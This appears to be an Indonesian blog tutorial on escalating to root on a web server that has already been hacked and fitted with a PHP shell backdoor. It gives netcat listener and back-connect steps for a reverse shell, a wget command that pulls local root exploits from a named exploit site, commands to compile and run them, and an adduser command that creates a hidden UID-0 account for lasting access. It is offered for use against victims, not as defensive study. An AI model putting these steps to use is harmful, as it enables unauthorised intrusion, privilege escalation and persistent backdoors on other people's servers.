Cara untuk ngeroot server & menambahkan user root baru, dikemudian hari bisa digunakan lebih jauh.
Hal yang dibutuhkan adalah:
  • Komputer & Kopi ngopi
  • Situs target yang sudah di inject “shell backdoor”
  • Tool-tool Localroot Exploit
  • Netcat
1. Cari Informasi Detail Server Target

Buka shell php di website yang sebelumnya telah ter-hack & terpasang backdoor “shell php”

Tampilannya akan seperti dibawah:
 Langkah selanjutnya adalah pastikan anda mengetahui kernel server yang dipakai, biasanya sudah ada informasinya di “shell backdoor” seperti contoh di atas yaitu:

Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686

Atau anda juga bisa menggunakan dan menjalankan perintah: uname -a

Dari informasi diatas kita ketahui bahwa kernelnya adalah: 2.6.18-8 i686

Nah, setelah mengetahui informasi kernel, maka langkah yang harus dilakukan adalah cari dan temukan “LocalRoot Exploit” tool yang cocok untuk kernel diatas. Sediakan localroot untuk kernel ini: 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.

Kita cari disini saja localroot exploitnya, kebetulan banyak listnya: localroot.th3-0utl4ws 

2. BackConnecting Dari Server Ke Komputer Attacker

Seperti yang disampaikan sebelumnya, yang dibutuhkan dalam hal ini adalah:

  1. Netcat Tools (Harus sudah terinstall di komputer)
  2. Open port (Port-port yang secara otomatis terbuka)

Buka netcat dan jalankan perintah berikut, misal port yang akan digunakan adalah 443:

C:\WINDOWS\system32\cmd.exe – nc -l -n -v -p 443

Kemudian tekan “Enter”

Nanti akan muncul pesan “Listening on [any] 443 …”

Setelah itu, kita kembali ke “shell backkdor” yang sudah kita tanamkan.
Cari fungsi “Back Connect“, kemudian isikan IP yang kita miliki & port.

Misal: IP Kita: 10.10.10.10 dan port: 443, seperti gambar dibawah:
Kita jalankan perintah “Connect”

Klo berhasil akan muncul seperti ini di layar command line kita, itu artinya back connect berhasil dengan sukses.
3. Download Exploit & Eksekusi Exploit
Kita akan membutuhkan localroot exploit, bisa di download dari link yang sudah disebutkan diatas, adapun beberapa cara yang bisa dilakukan yaitu:
  • Menggunakan fungsi “WGET / CURL”
  • Bisa menggunakan cara upload manual dari shell
Berhubung di server ini “WGET” bisa dilakukan, maka download localroot exploit memakai fungsi “WGET”.
Oke, copy saja download link “localroot exploit yang tepat:

Download Kumpulan Tools Localroot Dari Th3-0utl4ws
Untuk mendownload tools diatas ketikkan saja perintah:
wget http://localroot.th3-0utl4ws.com/xploits/2.6.18-164.zip

Apabila sudah terdownload maka extract “local root tools” tersebut, bisa dengan menggunakan perintah “unzip” atau “untar” atau “tar”

Seperti contoh diatas, “localroot exploit sudah terdownload” dan ter-extract:

unzip prct1.c.zip

Langkah selanjutnya adalah mengcompile localroot exploit tersebut, karena menggunakan bahasa “C”, maka yang digunakan adalah perintah GCC:

gcc prct1.c -o prc

Kemudian jalankan:

./prc

Catatan: Jika gagal dan muncul error, sebaiknya menggunakan tools “local root” exploit yang lainnya. (JANGAN MENYERAH!)

Yang di atas masih gagal, lakukan lagi & cari exploit lainnya!

Unzip lagi file localroot exploit yang lainnya: unzip 2.6.18-164.zip
 Nah, localroot exploit diatas sangat cocok untuk kernel ini: (“2.6.18-164“)

Karena sudah berbentuk file yang sudah dicompile dan sudah bisa di eksekusi, langsung saja dieksekusi & jangan lupa change permissionnya jadi “777″, seperti contoh berikut:

chmod 777 2.6.18-164

Kemudian jalankan exploit:

./2.6.18-164

Untuk mengecek apakah kita sudah berhasil mendapatkan akses root, check dengan perintah berikut:

id
or
whoami
Jreng.. Jreng.. Jreng.. Anda sudah mendapatkan akses root, congrat!

3. Menambahkan User Root Baru

Menambahkan user akses selevel dengan root sangatlah mudah, gunakan saja perintah berikut, sebagai contoh kita akan menambahkan akses root dengan user “Haxorfortutorial“:

adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M Haxorfortutorial

Penjelasan perintah:
Quote:

adduser – Perintah dasar linux untuk menambahkan user

-u 0 -o – set user menjadi dengan ID nol (0) root.

-g 0 – Set initial group dengan ID nol (0) root.

-G 0,1,2,3,4,6,10 – Set additional group ke:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M – ‘home directory’ tidak di create ke user.

Haxorfortutorial - User name of the new user account.

Catatan: Rubah user Haxorfortutorial sesuai dengan username yang kalian inginkan, ini hanya contoh saja.

Selanjutnya, lakukan set password untuk user yang telah kita buat.

Perintahnya:
passwd Haxorfortutorial

Contoh implementasi:

[root@fedora ~]# passwd Haxorfortutorial
Changing password for user Haxorfortutorial.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

id Haxorfortutorial
Semoga Membantu.. :)

0 komentar:

Post a Comment

 
Top